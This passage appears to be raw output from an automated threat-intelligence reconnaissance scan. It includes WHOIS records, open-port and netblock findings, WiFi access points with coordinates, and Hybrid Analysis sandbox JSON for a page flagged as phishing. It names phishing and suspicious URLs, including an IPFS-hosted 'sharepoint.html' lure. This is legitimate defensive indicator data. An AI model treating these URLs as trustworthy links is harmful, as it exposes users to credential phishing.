"BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00003384]\n "~DF77AE68F8612CDCE2.TMP" has type "data"- Location: [%TEMP%\\~DF77AE68F8612CDCE2.TMP]- [targetUID: 00000000-00003524]\n "9FF67FB3141440EED32363089565AE60_1A2C71E1B961FDAC74FBE1C7D07896B1" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\9FF67FB3141440EED32363089565AE60_1A2C71E1B961FDAC74FBE1C7D07896B1]- [targetUID: 00000000-00003384]\n "iphone_1_.png" has type "PNG image data 1024 x 1024 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "4L134F50.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4L134F50.txt]- [targetUID: 00000000-00003524]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003524]\n "80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE]- [targetUID: 00000000-00003524]\n "5E42C65D472B356D49EB3B8AD6849196" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\5E42C65D472B356D49EB3B8AD6849196]- [targetUID: 00000000-00003384]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00003384]\n "O7UT3CDV.htm" has type "HTML document ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\O7UT3CDV.htm]- [targetUID: 00000000-00003384]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003524]\n "mac_1_.png" has type "PNG image data 1024 x 1024 8-bit/color RGBA non-interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://macinstruct.sertfidancilik.com/"\n Pattern match: "https://macinstruct.sertfidancilik.com"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"\n Heuristic match: "x1.c.lencr.org"\n Heuristic match: "GET / HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"\n Heuristic match: "ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-s | 104.196.30.220 |
| 2023-05-12 02:44:21 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 185.199.108.153:443 | 185.199.108.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NH-NEW (Net ID: 00:01:21:30:F0:D3) | 37.7642, -122.3993 |
| 2023-05-12 03:42:54 | Affiliate - Domain Whois | No | Whois | 3 | 0 | 6 | 0 | None | Domain Name: INFLANY.COM
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: http://www.world4you.com
Updated Date: 2023-04-13T07:19:32Z
Creation Date: 2022-04-12T14:21:11Z
Registry Expiry Date: 2024-04-12T14:21:11Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.WORLD4YOU.AT
Name Server: NS2.WORLD4YOU.AT
DNSSEC: signedDelegation
DNSSEC DS Data: 36937 13 2 B736B70844AD09A9498F06982C97724A0BF4ACA8DE5244B40607B538A5323618
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:42:43Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: inflany.com
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: https://www.world4you.com
Updated Date: 2023-04-13T21:36:05Z
Creation Date: 2022-04-12T14:21:11Z
Registrar Registration Expiration Date: 2024-04-12T14:21:12Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email: abuse@world4you.com
Registrar Abuse Contact Phone: +43.73293035
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization:
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AT
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AT
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: https://whoispro.domain-robot.org/whois/inflany.com
Name Server: ns1.world4you.at
Name Server: ns2.world4you.at
DNSSEC: signedDelegation
URL of the ICANN WHOIS Data Problem Reporting System: https://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:42:54Z <<<
For more information on Whois status codes, please visit https://www.icann.org/epp
# World4You Internet Services GmbH WHOIS service.
#
# The data in the World4You WHOIS database is provided to you by
# World4You Internet Services GmbH for informational purposes only and
# may be used to assist persons in obtaining information about or
# related to a domain name registration record.
# Except for agreed Internet operational purposes (such as register or
# modify existing registrations), no part of this information may be
# stored, reproduced or transmitted by any means.
# World4You does not guarantee its accuracy.
#
# By submitting a WHOIS query, you agree that you will use this data
# only for lawful purposes and that, under no circumstances, you will
# use this data to
# (1) allow, enable, or otherwise support the transmission of mass
# unsolicited, commercial advertising or solicitations via E-mail
# (spam); or
# (2) enable high volume, automated, electronic processes that apply
# to World4You (or its computer systems).
# World4You reserves the right to modify these terms at any time.
# By submitting this query, you agree to abide by this policy.
# www.world4you.com - Your hostingprovider.at
| inflany.com |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 403 | https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS_24 (Net ID: 00:00:C5:D7:60:DC) | 41.8781, -87.6298 |
| 2023-05-12 03:17:35 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: AYU.XYZ
Registry Domain ID: D9607467-CNIC
Registrar WHOIS Server: whois.west.cn
Registrar URL: http://www.west.cn
Updated Date: 2023-02-11T09:04:01.0Z
Creation Date: 2015-08-20T20:34:37.0Z
Registry Expiry Date: 2023-08-20T23:59:59.0Z
Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD.
Registrar IANA ID: 1556
Domain Status: ok https://icann.org/epp#ok
Registrant Organization:
Registrant State/Province: Jiang Su
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS5.MYHOSTADMIN.NET
Name Server: NS6.MYHOSTADMIN.NET
Name Server: NS1.MYHOSTADMIN.NET
Name Server: NS2.MYHOSTADMIN.NET
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@west.cn
Registrar Abuse Contact Phone: +86.2862778877
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayu.xyz
Registry Domain ID: xy74494296952501
Registrar WHOIS Server: whois.west.cn
Registrar URL: www.west.cn
Updated Date: 2015-08-20T20:34:39.0Z
Creation Date: 2015-08-20T20:34:39.0Z
Registrar Registration Expiration Date: 2023-08-20T20:34:39.0Z
Registrar: Chengdu west dimension digital technology Co., LTD
Registrar IANA ID: 1556
Reseller:
Domain Status: ok http://www.icann.org/epp#ok
Registry Registrant ID: Not Available From Registry
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Jiang Su
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CN
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Registry Admin ID: Not Available From Registry
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Registry Tech ID: Not Available From Registry
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Name Server: ns1.myhostadmin.net
Name Server: ns2.myhostadmin.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: westabuse@gmail.com
Registrar Abuse Contact Phone: +86.2862778877
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
| ayu.xyz |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Patreon | nwapi2.battleb0t.xyz |
| 2023-05-12 02:56:25 | Netblock Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 207.154.224.0/20 | 207.154.228.169 |
| 2023-05-12 03:23:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.7:80 | 188.114.96.0/24 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2082 | 104.21.71.14 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00p513-dev.github.io]
https://www.openphish.com/feed.txt | 00p513-dev.github.io |
| 2023-05-12 03:32:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.4:80 | 188.114.97.0/24 |
| 2023-05-12 03:32:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.5:80 | 188.114.97.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | eminent992 (Net ID: 00:14:5C:86:B3:9A) | 50.8897, 6.0563 |
| 2023-05-12 02:45:34 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'SC', u'country_tld': u'.us', u'ip': u'34.74.170.74', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'North Charleston', u'network': u'34.74.0.0/15', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 32.853, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'GOOGLE-CLOUD-PLATFORM', u'postal': u'29405', u'asn': u'AS396982', u'country': u'US', u'region': u'South Carolina', u'longitude': -79.9876, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 34.74.170.74 |
| 2023-05-12 02:52:10 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://gateway.pinata.cloud/ipfs/bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq/sharepoint.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ab8_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ab8_ConnHashTable<2744>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2744"\n "IsoScope_ab8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_ab8_IESQMMUTEX_0_331"\n "IsoScope_ab8_IE_EarlyTabStart_0xb7c_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2744"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.64.154.225:443"\n "185.199.108.153:443"\n "69.16.175.10:443"\n "52.25.204.60:443"\n "13.227.74.22:443"\n "13.227.21.110:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "d3e54v103j8qbb.cloudfront.net"\n "gateway.pinata.cloud"\n "lipis.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "uploads-ssl.webflow.com"\n "www.pinatapreventsphishing.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string "ez=!0,b});return b}oz.M="internal.enableAutoEventOnYouTubeActivity";var pz;function qz(a){var b=!1;return b}qz.M="internal.evaluateMatchingRules";" (Indicator: "dir "; File: "js_2_.js")\n Found string ".fa-twitter-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-twitter:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-play:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-cc-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarA135.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarA136.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003300]\n "CabA133.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabA133.tmp]- [targetUID: 00000000-00003300]\n "CabA134.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabA134.tmp]- [targetUID: 00000000-00003300]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"628574b3d6d692ff2246c3d0_Pinnie-32x32_1_.png" has type "PNG image data 32 x 32 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfc28eb11266a33e63.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{c71d88ad-ece3-11ed-b7c5-0800276b7dae}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa772a493d0d30e3e.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c71d88ab-ece3-11ed-b7c5-0800276b7dae}.dat"\n "iexplore.exe" reads file "c:\\users\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\favorites\\desktop.ini"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{c71d88ad-ece3-11ed-b7c5-0800276b7dae}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfc28eb11266a33e63.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c71d88ab-ece3-11ed-b7c5-0800276b7dae}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"628522000a4c5387f2fdcf5a_Pinata-FullLogo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsgateway.pinata.cloudipfsbafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qqsharepoint.html" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "jquery-1.9.1_1_.js" has type "ASCII text"- [targetUID: N/A]\n "js_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "TarA135.tmp" has type "data"- Location: [%TEMP%\\TarA135.tmp]- [targetUID: 00000000-00003300]\n "jquery-3.5.1.min.dc5e7f18c8_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "fontawesome-webfont_1_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003300]\n "webflow.7f48192d4_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "phishing-redirect-page.webflow.c3340e897_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002744]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFA75422D8ACBE1A01.TMP" has type "data"- Location: [%TEMP%\\~DFA75422D8ACBE1A01.TMP]- [targetUID: 00000000-00002744]\n "~DF449D57FE67DC3D35.TMP" has type "data"- Location: [%TEMP%\\~DF449D57FE67DC3D35.TMP]- [targetUID: 00000000-00002744]\n "~DFA772A493D0D30E3E.TMP" has | 185.199.108.153 |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi2.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:50:55:6d:e5:64:92:a0:7f:d0:de:03:2b:af:77:c2:fc:fe
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: May 4 19:22:49 2023 GMT
Not After : Aug 2 19:22:48 2023 GMT
